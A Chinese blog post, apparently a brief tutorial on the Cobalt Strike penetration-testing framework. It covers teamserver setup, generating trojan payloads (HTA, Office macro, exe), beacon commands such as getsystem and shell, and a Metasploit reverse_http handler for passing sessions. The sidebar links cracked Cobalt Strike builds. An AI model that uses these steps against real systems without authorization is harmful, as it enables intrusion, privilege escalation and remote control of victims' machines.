CobaltStrike使用

最新推荐文章于 2024-05-31 08:25:44 发布
最新推荐文章于 2024-05-31 08:25:44 发布
阅读量52 收藏
点赞数
分类专栏: 工具使用 文章标签: linux 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_61899124/article/details/131171344
版权

目录

简介

基本使用

基本攻击流程

新建一个监听

生成payload

使用木马

常用命令

cs与msf联动

打开msf,启动handler监听

CS新建一个外部监听

在cs控制台输入

msf收到会话

简介

Cobalt Strike(简称为CS)是一款基于java的渗透测试工具(尤其是后渗透阶段),自3.0开始已经不再使用Metasploit框架而作为一个独立的平台使用,这款工具有其他很多渗透测试工具没有的团队合作功能,团队成员可以连接到同一个服务器上进行合作,共享攻击资源。

Cobalt Strike有端口转发、扫描、监听、生成各种木马、浏览器自动攻击等功能。

基本使用

服务端   ./teamserver 192.168.164.134 123456
客户端   ./start.sh

基本攻击流程

新建一个监听

listener

生成payload

HTML Application

基于HTML应用的payload模块,生成(executable/VBA/powershell)这三种原理实现的恶意HTA木马文件

MS Office Macro

生成office宏病毒文件

Payload Generator

生成各种语言版本的payload,如C ,C#,COM Scriptlet,Java,Perl,Python,PowerShell,Ruby,VBA.......

Windows Executable

 生成可执行exe木马

Windows Executable(Stageless)

生成无状态的可执行exe木马

使用木马

常用命令

help: 查看可用命令

getuid: 获取当前用户的权限

getsystem: 获取system权限

getprivs: 获取当前beacon里面的所有权限(这个用户现在能干嘛)

net domain_trusts: 列出域之间的信任关系

net logons:查看现在在登录的用户

net share:查看共享

shell xxx: 在命令行中执行xxx命令

powerpick xxx:不通过powershell来执行命令

cs与msf联动

打开msf,启动handler监听

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_http

set lhost xxxxxx   (本机ip)

set lport xxxx

exploit

CS新建一个外部监听

new listener

name   msf
payload   foregin http
host   与msf设置一致
port   与msf设置一致

在cs控制台输入

spawn msf

msf收到会话

仙322
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CobaltStrike4.8
05-30
使用方法 1、将server文件夹上传到java11环境的linux 然后使用以下命令启动(给teamserver和teamserver执行权限) ...2、使用java11环境的windows 双击client文件夹下的Cobalt-client.cmd 即可启动 默认连接端口50050
cobaltstrike4.0-cracked.zip
07-04
这是Cobalt Strike4.0的无后门版本,该版本仅供学习使用,请勿用于非法途径,请时刻遵守国家法律。
Cobalt Strike4.7最新版
11-03
windows及Linux都可兼容的版本,Cobalt Strike是一由美国安全团队研发的渗透测试工具,拥有多种协议等多种功能。Cobalt Strike还可以调用Mimikatz、Ladon等其他知名工具,因此广受技术安全渗透人员的喜爱。它分为...
Cobalt Strike4.1
12-30
Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。 Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe...
Cobalt-Strike-4.7
12-27
Cobalt Strike 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透,是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后...
Linux - 磁盘的分区和挂载
weixin_45735487的博客
05-27 757
逻辑分区只能在拓展分区上划分,编号5-15。拓展分区编号1-4,拓展分区不能格式化。rescue 恢复分区,对于误删的分区进行恢复,语法: rescue 起始 结束。rm 删除分区,后接要删除的分区编号。(L) 在主分区和拓展分区划分完之后,默认提示划分逻辑分区。n 进行磁盘分区,这里会默认MBR标签。(p) msdos下,会默认选择先划分主分区。
Linux】升级GCC(版本9.3),补充:binutils
yannan20190313的博客
05-27 808
Linux】升级GCC(版本9.3),补充:binutils
Linux】中常见的重要指令(下)以及重要的几个热键
2401_84568462的博客
05-27 1192
find指令查找的文件不能当前路径下(可以这样理解:如果要查找当前路径下可以使用ls指令,就不麻烦find指令了),必须查找当前路径下的目录里的文件。1.能被打包压缩的一定是由多个文件组成的,打包压缩后将文件变为一个整体,在传递给其他用户时不容易缺失。.tar打包后缀 .gz压缩后缀 XXX.tar.gz ----->XXX.tgz。功能:在系统特定的路径下查找,及可以找到可执行程序,有可以找到手册,安装包和压缩包等。命令在目录结构中搜索文件,并执行指定的操作。功能:在指令路径下搜索指令文件。
IMX6Q基于linux4.1.15调试音频芯片tas2505
qq_45147279的博客
05-29 166
获取时钟频率,因为我这边用的是外部晶振,不是使用CPU引脚MX6QDL_PAD_GPIO_0__CCM_CLKO1输出时钟的。如果上面of_match_table 的字符串跟设备树匹配上的话,接下来进入imx_tas2505_probe函数,这里我想说说设置ssi和audmux的方向问题,要么是由CPU输出BCLK,WCLK给音频芯片;tas2505_dai中的name变量名需要跟imx-tas2505.c中struct snd_soc_dai_link中的codec_dai_name变量名一样。
Linux】进程(1)
最新发布
qq_75000174的博客
05-31 854
父进程的代码和数据是从磁盘加载过来的,子进程的代码默认继承父进程的代码,数据我们后面会学:如果子进程没有写入,那父子进程的数据也是共享的,如果父子进程中有一个要对数据进行写入,那么会发生写时拷贝,数据就不共享了。所以,如果没有存储器(内存),那么一台电脑的成本就高,而高成本的东西是不利于广泛传播和使用的,所以内存的存在还是非常有必要的。第一行是我们所找的myprocess进程,第二行是我们使用grep命令所运行的进程,记得吗,我们前面讲的,在Linux中运行的大部分执行操作,本质都是运行进程。
Linux 虚拟机 同一局域网下,宿主机及其他物理机 互联,通过桥接模式实现
m0_63628018的博客
05-31 210
实现方式:虚拟机-网络连接-桥接模式。
linux硬盘
Alone8046的博客
05-27 712
主引导记录:一共446字节,一般在操作系统安装时写入主引导记录,MBR就是一个引导程序,检测硬盘的分区是否合法、工作正常,加载操作系统。5.分区第五步建立逻辑分区,扩展分区建立了多大,逻辑分区只能是多大(只有先创建扩展分区后才能建立逻辑分区,扩展分区记录的是逻辑分区的信息;1.1先输入命令fdisk /dev/sdb 进入创建硬盘分区的界面,然后输入d和你想删除的哪个分区,之后按w保存退出即可。四、MBR分区表(4个分区,其中3个主分区和1个扩展分区):最多只能分2T,超过2T的硬盘不能使用MBR分区。
linux磁盘配额
XH722DF的博客
05-28 399
dev/zero:“零”设备文件,可以提供无限的空字符,一般用来生成一个特定大小的文件。会在/data1/123.txt 生成: 一个120M的文件123txt。linux根分区 根分区的空间完全耗尽 服务程序崩溃 系统也无法启动了。linux的磁盘空间有两个方面 第一个是物理空间 也就是磁盘容量。bhard 硬限制 到了指定的配置就不可以继续写入了100M。为了防止有人恶意的占用磁盘空间 我们就有了磁盘配额的功能。第一个 逻辑卷 动态扩容 卷组可以扩容 逻辑卷也可以扩容。
Linux:进程控制(二.详细讲解进程程序替换)
qq_74415153的博客
05-29 1133
1.进程程序替换 1.1概念 1.2原理 1.3使用一个 exec 系列函数 函数 execl() 结论与细节 2.多进程时的程序替换 3.其他几个exec系列函数 也可以调用其他语言的程序 想要生成两个可执行文件的 makefile
linux日常运维2
weixin_42419429的博客
05-27 329
linux操作系统,这里是以centos7操作系统为例,如果要使用centos6就先安装一个centos6的系统,然后让他可以上网,后面步骤如下。c.更新源 yum clean all;d.安装Downloadonly插件。a. 先备份原有的yum.repo源。e. 下载你要安装的软件。下载linux离线安装包----
linux安全配置
qq_52712762的博客
05-27 1247
Linux种类较多,常见的有Redhat、Ubuntu、Centos、SUSE等根据不同版本,其安全配置都不太相同,主要体现在以下三点①配置文件所存放的路径②操作系统的命令③操作系统自身的安全特性或工具我们以Centos7为例,进行安全配置讲解,其它版本Linux可能存在安全配置方式不同,但整体配置的维度和原则是一致的。
Deepin Linux 深度 V23 beige 官方源及换镜像源方法。
funsion的专栏
05-29 301
Deepin Linux 深度 V23 英文版本号:beige。
Linux文本文件管理003
2402_83480790的博客
05-28 529
wc 统计文件中的字节数、单词数、行数。今天先分享到这里,希望能够帮助到大家……sort -n按照数值排序。uniq 过滤相邻、重复的行。
Linux DHCP server 配置
weixin_43054437的博客
05-29 337
linux DHCP服务器配置静态IP
cobaltstrike使用
09-14
为了使用CobaltStrike工具,首先需要安装Java环境。根据引用中的信息,在Kali系统上使用jdk11,在两台Windows 7系统上使用jdk1.8。 使用CobaltStrike的详细步骤如下: 1. 启动CobaltStrike团队服务器,可以使用命令...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值